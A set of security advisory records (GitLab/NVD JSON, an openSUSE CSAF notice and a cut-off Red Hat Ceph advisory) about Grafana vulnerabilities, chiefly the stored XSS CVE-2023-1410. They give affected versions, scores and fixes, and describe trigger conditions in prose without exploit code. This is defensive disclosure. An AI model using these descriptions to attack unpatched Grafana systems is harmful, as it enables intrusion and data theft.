"advisories": [
{
"affected_range": "\u003e=8.0.0 \u003c8.5.22||\u003e=9.0.0 \u003c9.2.15||\u003e=9.3.0 \u003c9.3.11||\u003e=9.4.0 \u003c9.4.7",
"affected_versions": "All versions starting from 8.0.0 before 8.5.22, all versions starting from 9.0.0 before 9.2.15, all versions starting from 9.3.0 before 9.3.11, all versions starting from 9.4.0 before 9.4.7",
"cwe_ids": [
"CWE-1035",
"CWE-79",
"CWE-937"
],
"date": "2023-03-23",
"description": "Grafana is an open-source platform for monitoring and observability. Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized. An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description. Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.",
"fixed_versions": [
"8.5.22",
"9.3.11",
"9.2.15",
"9.4.7"
],
"identifier": "CVE-2023-1410",
"identifiers": [
"GHSA-qrrg-gw7w-vp76",
"CVE-2023-1410"
],
"not_impacted": "All versions before 8.0.0, all versions starting from 8.5.22 before 9.0.0, all versions starting from 9.2.15 before 9.3.0, all versions starting from 9.3.11 before 9.4.0, all versions starting from 9.4.7",
"package_slug": "go/github.com/grafana/grafana",
"pubdate": "2023-03-23",
"solution": "Upgrade to versions 8.5.22, 9.3.11, 9.2.15, 9.4.7 or above.",
"title": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"urls": [
"https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76",
"https://nvd.nist.gov/vuln/detail/CVE-2023-1410",
"https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc",
"https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6",
"https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a",
"https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a",
"https://grafana.com/security/security-advisories/cve-2023-1410/",
"https://github.com/advisories/GHSA-qrrg-gw7w-vp76"
],
"uuid": "3639cce0-69e2-48a3-a3c9-e50ec0bf6004"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.3.11",
"versionStartExcluding": "9.3.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.2.15",
"versionStartIncluding": "9.2.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.5.22",
"versionStartIncluding": "8.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-1410"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Grafana is an open-source platform for monitoring and observability.\u00a0\n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.\u00a0\n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix. \n\n\n\n\n\n\n\n\n\n\n"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76",
"refsource": "MISC",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"name": "https://grafana.com/security/security-advisories/cve-2023-1410/",
"refsource": "MISC",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-1410/"
},
{
"name": "https://security.netapp.com/advisory/ntap-20230420-0003/",
"refsource": "MISC",
"tags": [],
"url": "https://security.netapp.com/advisory/ntap-20230420-0003/"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7
}
},
"lastModifiedDate": "2023-04-20T09:15Z",
"publishedDate": "2023-03-23T08:15Z"
}
}
}
OPENSUSE-SU-2024:12855-1
Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00Summary
grafana-9.4.7-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: grafana-9.4.7-1.1 on GA media
Description of the patch: These are all security issues fixed in the grafana-9.4.7-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2024-12855
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.7 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:grafana-9.4.7-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-9.4.7-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-9.4.7-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:grafana-9.4.7-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "grafana-9.4.7-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the grafana-9.4.7-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-12855",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_12855-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1410 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1410/"
}
],
"title": "grafana-9.4.7-1.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:12855-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "grafana-9.4.7-1.1.aarch64",
"product": {
"name": "grafana-9.4.7-1.1.aarch64",
"product_id": "grafana-9.4.7-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-9.4.7-1.1.ppc64le",
"product": {
"name": "grafana-9.4.7-1.1.ppc64le",
"product_id": "grafana-9.4.7-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-9.4.7-1.1.s390x",
"product": {
"name": "grafana-9.4.7-1.1.s390x",
"product_id": "grafana-9.4.7-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-9.4.7-1.1.x86_64",
"product": {
"name": "grafana-9.4.7-1.1.x86_64",
"product_id": "grafana-9.4.7-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.4.7-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-9.4.7-1.1.aarch64"
},
"product_reference": "grafana-9.4.7-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.4.7-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-9.4.7-1.1.ppc64le"
},
"product_reference": "grafana-9.4.7-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.4.7-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-9.4.7-1.1.s390x"
},
"product_reference": "grafana-9.4.7-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.4.7-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:grafana-9.4.7-1.1.x86_64"
},
"product_reference": "grafana-9.4.7-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1410"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. \n\nGrafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. \n\nThe stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.\n\nAn attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description. \n\n Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:grafana-9.4.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1410",
"url": "https://www.suse.com/security/cve/CVE-2023-1410"
},
{
"category": "external",
"summary": "SUSE Bug 1209645 for CVE-2023-1410",
"url": "https://bugzilla.suse.com/1209645"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:grafana-9.4.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:grafana-9.4.7-1.1.aarch64",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.ppc64le",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.s390x",
"openSUSE Tumbleweed:grafana-9.4.7-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-06-15T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2023-1410"
}
]
}
RHSA-2023:7741
Vulnerability from csaf_redhat - Published: 2023-12-12 13:55 - Updated: 2026-05-30 20:35Summary
Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update
Severity
Important
Notes
Topic: Updated container image for Red Hat Ceph Storage 6.1 is now available in the Red Hat Ecosystem Catalog.
Details: Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.
This updated container image is based on Red Hat Ceph Storage 6.1 and Red Hat Enterprise Linux.
Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Ceph Storage Release Notes for information on the most significant of these changes:
https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6.1/html/release_notes/index
All users of Red Hat Ceph Storage are advised to pull these new images from the Red Hat Ecosystem catalog.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in Grafana. This flaw allows a remote, authenticated attacker to obtain sensitive information caused by an issue when enabling the "url_login" configuration option. By sending a specially crafted request, an attacker can obtain JWT information and use this to launch further attacks against the affected system.
7.5 (High)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Threats
Impact
Moderate
A flaw was found in Grafana. This flaw allows an attacker to host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker-controlled XSS payload will be executed.
4.8 (Medium)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Threats
Impact
Moderate
A flaw was found in grafana. This issue may allow a malicious user to craft a request to the API that enables them to send alert messages via the "API Alert - Test".
4.3 (Medium)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x | — | ||
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 | — |
Threats
Impact
Moderate
A flaw was found in grafana. This issue occurs when sending an API call to the /ds/query or public dashboard query endpoint that has mixed queries, such as having two or more distinct data sources in one API call. As a result, the Grafana instance will crash. Currently, the only feature that uses mixed queries within Grafana is public dashboards, but it is also possible to trigger this issue by calling the API directly. If public dashboards are enabled, reproduction requires a public dashboard to be under a heavy load. If public dashboards are disabled, reproduction only occurs when the /ds/query endpoint with a mixed query payload is under a heavy load with a load testing script.
7.5 (High)
Affected products
Fixed
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 | — |
Workaround
|
|
| Unresolved product id: 9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x | — |
Workaround
|
|
